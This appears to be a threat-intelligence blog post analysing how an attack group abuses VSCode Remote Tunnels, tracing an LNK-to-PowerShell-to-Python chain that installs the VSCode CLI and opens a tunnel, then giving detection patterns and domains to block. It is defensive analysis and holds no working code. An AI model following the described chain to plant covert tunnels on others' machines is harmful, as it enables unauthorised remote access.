Exploiting VSCode Remote Tunnels for Remote Code Execution on Victim's Machine

Tran Hoang PhongTran Hoang Phong
5 min read

What are Remote Tunnels?

Concept of Remote Tunnels

Remote Tunnels is a feature integrated into Microsoft VSCode. This feature allows users to connect to remote machines, such as desktops or virtual machines (VMs), through a tunnel. Users can connect to that machine from a VS Code client anywhere without needing SSH.

How Remote Tunnels Work

For example, when a user wants to access the coding environment on their company's computer, they just need to enable Remote Tunnels in VSCode. The tool will then provide the user with a URL. The user simply pastes that URL into a web browser, authenticates with a Microsoft or GitHub account, and they will have access to the local coding environment on that machine (if they have been granted permission). Users can also grant access to the tunnel to colleagues, allowing them to connect to the coding environment.

How are Remote Tunnels Abused?

Recently, the abuse of VSCode Remote Tunnel has been on the rise, as evidenced by many attack groups using this tool in their campaigns.

Initially, a malicious script or LNK file is sent to the victim to check if their system has VSCode installed. If VSCode is not present, the attacker will automatically install the CLI version of VSCode. Once completed, they set up a remote tunnel, creating a hidden access channel from the victim's computer to the attacker's system.

Technical Analysis

We will use a campaign conducted by Mustang Panda (also known as Stately Taurus) as an example for analysis.

Attack Chain Analysis

Infection chain for remote tunnels

The attack chain of the campaign goes through the following steps:

  1. Send a malicious LNK file, such as: update.py

  2. The LNK file contains a PowerShell command to download and run a Python script from a remote IP address

  3. The Python script downloads and runs the CLI version of VSCode, called code-insiders.exe

  4. The Python script creates and authenticates a VSCode tunnel using CLI and connects to GitHub

  5. The VSCode remote tunnel is established.

  6. The attacker executes remote commands through the Python payload, using the established tunnel from a web browser.

Executing the LNK File

The LNK file will contain a simple PowerShell command that downloads a Python script from a web server and executes the script.

PowerShell command to download and run python

Executing the Python Script

The Python script downloads the CLI binary for the Code Insiders version of VSCode. It then creates a tunnel and generates an authentication link.

VSCode remote tunnel setup script

Connecting to the Tunnel

The attacker needs to obtain the GitHub device code that the Python script sends back to authenticate and enter it at the URL https://github.com/login/device. This is easily done as the attacker is authenticating with GitHub using their account.

Github authentication for VSCode remote tunnels

The attacker then needs to allow the tunnel to connect to their account.

GitHub device authentication for VScode remote tunnels

After authenticating the account, the attacker will see a list of remote hosts using the tunnel that they can connect to.

Remote tunnel host

Remote tunnel host

The attacker can now access directories on the victim's remote host.

Directory traversal VSCode remote tunnel

Finally, they can create new files, scripts, and execute them remotely.

Conclusion

In summary, the Remote Tunnel feature on VSCode is extremely powerful and provides the ability to execute remote code execution commands. The most frightening aspect is that the attacker can accomplish all of this with just a simple LNK file sent to the user.

How to Detect VSCode Remote Tunnel

PowerShell Execution

Detecting the abuse of VSCode Remote Tunnel can be done by monitoring the execution behavior of LNK files to download and run Python scripts.

We can further filter by searching for certain PowerShell parameters, such as Invoke-WebRequest, OutFile, and python.

Setting Up VSCode Tunnel

Attackers often rename the code.exe or code-insiders.exe file on the system, so searching for malicious behavior by file name is quite meaningless.

Therefore, we must focus on behaviors that attackers cannot change, such as passing the --accept-server-license-terms parameter during execution. This parameter allows the remote server to start without further user confirmation.

Script Execution

System administrators need to monitor processes related to PowerShell, especially when it launches tools like Python.

Additionally, monitoring command line parameters can help detect abnormal behaviors, such as using strange parameters or scripts from unknown sources.

Network Connections

The main domain used by VSCode tunnel is:

global.rel.tunnels.api.visualstudio.com

Blocking this domain in the organization will prevent the use of tunnels. Other domains used as part of the VSCode tunnel include:

URL/DomainDescription
https://code.visualstudio.com/sha/download?build=stable&os=cli-alpine-x64VSCode CLI Download Domain
https://code.visualstudio.com/sha/download?build=insider&os=cli-win32-x64Code Insiders CLI Download
vscode.devDomain for VSCode browser session
insiders.vscode.devDomain for Code Insiders browser session

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent this campaign:

  • Disable anonymous tunnel access: Do not allow anonymous tunnel access.

  • Disable Dev Tunnels: Almost all commands, with a few exceptions, should be denied access (Exceptions: unset, echo, ping, and user).

  • Allow only Microsoft Entra tenant ID in the list: Users must be authenticated in the allowlist to access Dev Tunnels.

References

0
Subscribe to my newsletter

Read articles from Tran Hoang Phong directly inside your inbox. Subscribe to the newsletter, and don't miss out.

remote tunnelenglishvscode extensionsvscodeRCEthreat intelligence

Written by

Tran Hoang Phong
Tran Hoang Phong

Just a SOC Analysis ^^